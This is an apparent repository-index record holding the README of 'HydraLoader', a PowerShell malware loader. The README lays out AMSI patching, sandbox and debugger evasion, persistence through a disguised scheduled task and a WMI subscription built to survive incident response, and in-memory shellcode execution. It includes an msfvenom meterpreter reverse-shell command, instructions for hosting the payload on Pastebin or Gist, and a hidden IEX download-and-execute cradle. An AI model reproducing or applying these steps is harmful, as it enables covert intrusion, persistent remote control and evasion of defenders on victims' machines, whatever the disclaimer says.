{"id":31626344,"url":"https://github.com/zeroethical/hydraloader","last_synced_at":"2025-10-18T13:32:12.892Z","repository":{"id":317070423,"uuid":"1065632361","full_name":"ZeroEthical/HydraLoader","owner":"ZeroEthical","description":"A convenient PowerShell loader specialized in in-memory execution, self-healing persistence, and full anti-analysis","archived":false,"fork":false,"pushed_at":"2025-09-28T15:46:15.000Z","size":1496,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-28T17:42:02.235Z","etag":null,"topics":["loader","malware","powershell","script"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ZeroEthical.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-28T05:49:09.000Z","updated_at":"2025-09-28T15:46:17.000Z","dependencies_parsed_at":null,"dependency_job_id":"2c008eaa-ed45-458a-9e47-117c5d3a7f1c","html_url":"https://github.com/ZeroEthical/HydraLoader","commit_stats":null,"previous_names":["zeroethical/hydraloader"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/ZeroEthical/HydraLoader","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ZeroEthical%2FHydraLoader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ZeroEthical%2FHydraLoader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ZeroEthical%2FHydraLoader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ZeroEthical%2FHydraLoader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ZeroEthical","download_url":"https://codeload.github.com/ZeroEthical/HydraLoader/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ZeroEthical%2FHydraLoader/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278671749,"owners_count":26025743,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-06T02:00:05.630Z","response_time":65,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["loader","malware","powershell","script"],"created_at":"2025-10-06T19:50:49.252Z","updated_at":"2025-10-06T19:50:52.604Z","avatar_url":"https://github.com/ZeroEthical.png","language":"PowerShell","readme":"\u003cp align=\"center\"\u003e\n \u003cimg src=\"https://github.com/ZeroEthical/PowerShell-Loader/blob/main/unnamed.png\" width=\"600\"/\u003e\n\u003c/p\u003e\n\u003ch1 align=\"center\"\u003e\n \u003cbr\u003e\n 🐍 HydraLoader 🛡️\n \u003cbr\u003e\n\u003c/h1\u003e\n\n\u003ch4 align=\"center\"\u003eThe process that refuses to die. A PowerShell loader built on a self-healing persistence engine, designed to survive and thrive even under active incident response.\u003c/h4\u003e\n\n\u003cp align=\"center\"\u003e\n \u003ca href=\"https://github.com/ZeroEthical/HydraLoader/blob/main/LICENSE\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/License-MIT-blue.svg?style=for-the-badge\" alt=\"License\"\u003e\n \u003c/a\u003e\n \u003ca href=\"#\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/Language-PowerShell-blue.svg?style=for-the-badge\u0026logo=powershell\" alt=\"Language\"\u003e\n \u003c/a\u003e\n \u003ca href=\"https://github.com/ZeroEthical\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/Author-ZeroEthical-purple?style=for-the-badge\" alt=\"Author\"\u003e\n \u003c/a\u003e\n \u003ca href=\"#\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/Maintained%3F-Yes-green.svg?style=for-the-badge\" alt=\"Maintained\"\u003e\n \u003c/a\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n \u003ca href=\"#-about-the-project\"\u003eAbout\u003c/a\u003e •\n \u003ca href=\"#-key-features\"\u003eKey Features\u003c/a\u003e •\n \u003ca href=\"#-architecture--flow\"\u003eArchitecture\u003c/a\u003e •\n \u003ca href=\"#-getting-started\"\u003eGetting Started\u003c/a\u003e •\n \u003ca href=\"#-disclaimer\"\u003eDisclaimer\u003c/a\u003e •\n \u003ca href=\"#-author\"\u003eAuthor\u003c/a\u003e\n\u003c/p\u003e\n\n---\n\n## 📖 About The Project\n\n**HydraLoader** is a highly sophisticated and resilient PowerShell-based payload execution framework, designed for advanced penetration testing and red teaming operations. It employs a multi-layered approach to evasion, persistence, and in-memory execution, aiming to operate undetected in modern, highly monitored environments.\n\n---\n\n## ✨ Key Features\n\n\u003cdetails\u003e\n\u003csummary\u003e🧠 \u003cstrong\u003eEvasion \u0026 Anti-Analysis\u003c/strong\u003e\u003c/summary\u003e\n\u003cbr\u003e\n\n- **In-Memory AMSI Bypass**: Dynamically patches the Antimalware Scan Interface (AMSI) at runtime to neutralize script-based threat detection.\n- **Comprehensive Environment Checks**: Actively detects and evades analysis environments by checking for:\n - **Debuggers**: Uses native `IsDebuggerPresent()` API calls.\n - **Sandboxes**: Verifies system RAM, CPU core count, and uptime.\n - **Analysis Tools**: Scans for common virtualization and analysis processes (e.g., Wireshark, Process Monitor, VMware/VirtualBox tools).\n- **Deep Obfuscation**: The entire script is heavily obfuscated, with critical strings (API functions, DLLs) Base64 encoded and a compacted code structure to deter static analysis.\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e🐍 \u003cstrong\u003eThe \"Hydra\" Persistence Engine\u003c/strong\u003e\u003c/summary\u003e\n\u003cbr\u003e\n\nHydraLoader employs a dual-headed, self-healing persistence mechanism to ensure long-term access and resilience against removal attempts.\n\n- **Method 1: Scheduled Task (Elevated Privileges)**: Creates a scheduled task disguised as a legitimate system process (`Microsoft Compatibility Appraiser`) that runs with `SYSTEM` privileges at logon.\n- **Method 2: WMI Event Subscription (Maximum Stealth)**: Establishes a permanent WMI event subscription that triggers on a timer. This method is extremely difficult to detect as it resides in the WMI repository, outside of standard auto-run locations.\n- **Self-Healing Capability**: On each execution, the framework checks if both persistence mechanisms are active. If one has been discovered and removed, the other automatically recreates it, ensuring the \"Hydra\" survives.\n\u003c/details\u003e\n\n\u003cdetails\u003e\n\u003csummary\u003e🚀 \u003cstrong\u003ePayload Execution\u003c/strong\u003e\u003c/summary\u003e\n\u003cbr\u003e\n\n- **\"Fileless\" In-Memory Operation**: The payload is downloaded directly into a memory buffer, decoded, and executed without ever touching the disk, minimizing the forensic footprint.\n- **AES-256 Decryption Framework**: Includes a function to decrypt payloads using AES-256 (CBC). This allows the payload to be stored and transmitted in an encrypted state, rendering it useless to network inspection tools. *(Note: Requires a pre-encrypted payload)*.\n- **Dynamic API Resolution**: Resolves all necessary Windows API functions dynamically at runtime, avoiding suspicious static import tables.\n\u003c/details\u003e\n\n---\n\n## ⚙️ Architecture \u0026 Flow\n\n1. **Initialization**: The AMSI bypass is executed instantly.\n2. **Evasion Checks**: The script performs all anti-analysis and anti-sandbox checks. If any fail, it terminates silently.\n3. **Persistence Check \u0026 Repair**: The Hydra engine verifies that both the Scheduled Task and WMI Subscription are in place. If not, it creates them.\n4. **Payload Delivery**: The framework downloads the payload from the configured URL directly into memory.\n5. **Decryption \u0026 Preparation**: The payload is Base64 decoded. If AES is enabled, it is then decrypted.\n6. **Execution**: The final payload is injected into memory and executed via stealthy Windows API calls.\n\n---\n\n## 🚀 ¿How to use Hydra?\n\nThis guide will walk you through preparing your payload, configuring HydraLoader, and deploying it on a target system.\n\n### Step 1: Payload Preparation (Example with `msfvenom`)\n\nFirst, you need to generate your shellcode. For this example, we'll create a simple reverse shell payload.\n\n1. **Generate Raw Shellcode**:\n Use a tool like Metasploit's `msfvenom` to create the raw shellcode.\n\n ```bash\n msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f raw -o shellcode.bin\n ```\n \u003e Replace `YOUR_IP` and `YOUR_PORT` with your listener's details.\n\n2. **Encode the Shellcode in Base64**:\n HydraLoader expects the payload to be Base64 encoded.\n\n ```powershell\n # In PowerShell\n $bytes = [System.IO.File]::ReadAllBytes(\"C:\\path\\to\\shellcode.bin\")\n [System.Convert]::ToBase64String($bytes) | Out-File shellcode_b64.txt\n ```\n \u003e Copy the resulting Base64 string. You'll need it in the next step.\n\n### Step 2: Host Your Payload\n\n1. **Host the Base64 Payload**:\n Paste the Base64 string you just copied into a file (e.g., `payload.txt`) and host it on a web server or a service like GitHub Gist, Pastebin, etc.\n2. **Get the Raw URL**:\n Make sure you have a direct, raw link to the file content. For example, a GitHub Gist raw URL looks like `https://gist.githubusercontent.com/user/gist_id/raw/payload.txt`.\n\n### Step 3: Configure HydraLoader\n\nNow, you need to configure the `MALWARE DECODED.ps1` script itself.\n\n1. **Update the Payload URL**:\n - Find the `$cfg` hashtable at the beginning of the script.\n - Locate the key `$cfg.o`. This holds the Base64 encoded URL of your payload.\n - First, encode your raw payload URL in Base64:\n ```powershell\n [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"https://your-raw-payload-url.com/payload.txt\"))\n ```\n - Replace the existing value of `$cfg.o` with your new Base64 encoded URL.\n\n### Step 4: (Optional) Configure AES Encryption for Maximum Stealth\n\nIf you want to add another layer of protection, you can encrypt your payload.\n\n1. **Generate a Key and IV**:\n You need a 32-byte (256-bit) key and a 16-byte (128-bit) IV. You can generate them in PowerShell:\n ```powershell\n # Generate a random 32-byte key\n $key = -join ((0..31) | ForEach-Object { [char](Get-Random -Minimum 65 -Maximum 90) })\n # Generate a random 16-byte IV\n $iv = -join ((0..15) | ForEach-Object { [char](Get-Random -Minimum 65 -Maximum 90) })\n\n Write-Host \"Key: $key\"\n Write-Host \"IV: $iv\"\n ```\n\n2. **Encrypt the Shellcode**:\n Use your favorite encryption script or tool (like CyberChef) with your generated Key and IV to encrypt your **raw** shellcode file (`shellcode.bin`). Then, Base64 encode the **encrypted** output.\n\n3. **Configure HydraLoader with Keys**:\n - Base64 encode your Key and IV:\n ```powershell\n [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"YOUR_32_BYTE_KEY_HERE\"))\n [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(\"YOUR_16_BYTE_IV_HERE\"))\n ```\n - Update `$cfg.r` (key) and `$cfg.s` (IV) in the script with these new Base64 values.\n\n4. **Activate Decryption in Script**:\n - In the `MALWARE DECODED.ps1` script, find the payload handling section.\n - Uncomment the three lines responsible for decryption:\n ```powershell\n # $k = [System.Text.Encoding]::UTF8.GetBytes((Get-Data $cfg.r)); $iv = [System.Text.Encoding]::UTF8.GetBytes((Get-Data $cfg.s))\n # $exec_buf = Expand-Stream -d $buf -k $k -iv $iv; if (-not $exec_buf) { exit }\n ```\n And comment out the line that bypasses it:\n ```powershell\n # $exec_buf = $buf\n ```\n\n### Step 5: Deployment\n\nWith your payload prepared and HydraLoader configured, you're ready for deployment.\n\n1. **Set Up Your Listener**:\n Start your C2 listener (e.g., Metasploit's `multi/handler`) to catch the incoming connection.\n\n2. **Execute on Target**:\n Deliver and execute the `MALWARE DECODED.ps1` script on the target machine. You can use any standard execution method:\n ```powershell\n # Example: Direct execution\n powershell.exe -ExecutionPolicy Bypass -File \".\\MALWARE DECODED.ps1\"\n\n # Example: Remote download and execution (IEX cradle)\n powershell.exe -nop -w hidden -c \"IEX(New-Object Net.WebClient).DownloadString('http://your-server/MALWARE%20DECODED.ps1')\"\n ```\n On its first run, HydraLoader will set up its persistence mechanisms and then proceed with the payload execution. Subsequent runs will ensure persistence is maintained before executing the payload.\n\n---\n\n## ⚠️ Disclaimer\n\nThis tool is intended for authorized red teaming, security research, and educational purposes **only**. Unauthorized use of this framework against any system is illegal. The author assumes no liability and is not responsible for any misuse or damage caused by this program.\n\n---\n\n## 🙏 Acknowledgements\n\nA special thanks to our friends in the Telegram community for providing the base code that inspired the creation of this project.\n\n- [@scarlettaowner](https://t.me/scarlettaowner)\n- [@viperzcrew](https://t.me/viperzcrew2)\n\n---\n\n## ✍️ Author\n\n- **ZeroEthical** - [GitHub](https://github.com/ZeroEthical) [Telegram](https://t.me/ZeroEthical)\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzeroethical%2Fhydraloader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzeroethical%2Fhydraloader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzeroethical%2Fhydraloader/lists"}